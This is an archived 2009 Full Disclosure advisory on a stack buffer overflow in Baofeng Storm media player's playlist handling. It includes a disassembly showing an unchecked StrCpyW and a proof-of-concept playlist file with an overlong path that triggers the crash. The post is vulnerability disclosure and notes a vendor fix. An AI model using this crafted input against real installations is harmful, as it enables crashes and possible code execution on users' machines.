Home page logo
/

fulldisclosure logo Full Disclosure mailing list archives

Baofeng Media Player playlist stack overflow vulnerability
From: "Jambalaya ." <jambalaya.maillist () gmail com>
Date: Mon, 29 Jun 2009 10:54:05 +0800

Baofeng Media Player playlist stack overflow vulnerability

By Jambalaya of Nevis Labs
Date: 2009.06.24


Vender:
Baofeng

Affected:
Storm 3.9.62
*Other version may also be affected

Overview:
Baofeng is a widely popular media player in China, and it plays many common
media file formats. There are almost 120 million customer using baofeng
media player in China.

Details:
The specific flaws exists in medialib.dll. the stack overflow vulnerablility
is due to the way it incorrectly handle smpl file type which is a
playlist.Succssfully exploiting this vulnerability allows attackers to
execute arbitrary code on vulnerable installation.

the vulnerability could be triggered when it pass a long path, and lack
legal examine on the length of path:

.text:1000567B ; int __stdcall sub_1000567B(LPCWSTR pszUrl,DWORD pcchPath)
.text:1000567B sub_1000567B    proc near               ; DATA XREF:
.rdata:100248D4o
.text:1000567B
.text:1000567B FileName        = word ptr -628h
.text:1000567B var_10          = dword ptr -10h
.text:1000567B var_C           = dword ptr -0Ch
.text:1000567B var_4           = dword ptr -4
.text:1000567B pszUrl          = dword ptr  8
.text:1000567B pcchPath        = dword ptr  0Ch
.text:1000567B
.text:1000567B                 mov     eax, offset sub_100221F8
.text:10005680                 call    __EH_prolog
.text:10005685                 sub     esp, 61Ch
.text:1000568B                 push    ebx
.text:1000568C                 push    esi
.text:1000568D                 mov     esi, [ebp+pszUrl]
.text:10005690                 mov     [ebp+var_10], ecx
.text:10005693                 test    esi, esi
.text:10005695                 jz      loc_1000577D
.text:1000569B                 mov     ebx, [ebp+pcchPath]
.text:1000569E                 test    ebx, ebx
.text:100056A0                 jz      loc_1000577D
.text:100056A6                 push    edi
.text:100056A7                 push    esi             ; pszPath
.text:100056A8                 xor     edi, edi
.text:100056AA                 mov     [ebp+pcchPath], 208h
.text:100056B1                 call    ds:PathIsURLW
.text:100056B7                 test    eax, eax
.text:100056B9                 jz      short loc_100056E0
.text:100056BB                 push    3               ; UrlIs
.text:100056BD                 push    esi             ; pszUrl
.text:100056BE                 call    ds:UrlIsW
.text:100056C4                 test    eax, eax
.text:100056C6                 jz      short loc_100056E0
.text:100056E0 loc_100056E0:                           ; CODE XREF:
sub_1000567B+3Ej
.text:100056E0                                         ; sub_1000567B+4Bj
.text:100056E0                 lea     eax, [ebp+FileName]
.text:100056E6                 push    esi
.text:100056E7                 push    eax
.text:100056E8                 call    ds:StrCpyW
<---------------------strcpy directly with out any examiation.

Proof of concept:
<playlist><item name="2.GIF" source="C:\Documents and
Settings\Linlin\桌面\2.GIF" duration="0"/><item name="0001.gif"
source="C:\Documents and
Settings\Linlin\桌面\rrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrrhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhhgggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggggfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeedddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddcccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaawwwwwwwwwwwwwjjjjjjjjjjjjjjjjjpppppppppppppppptttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttttyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyyy.gif"
duration="0"/></playlist>


Greetz to those friends who I have long time no see T_T:Pratik Dixit, Sanjay
pendse, Winny Thomas, ajit.hatti

Vendor Response:
2009.06.16 Vendor notified via email
2009.06.25 Vendor release new version
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault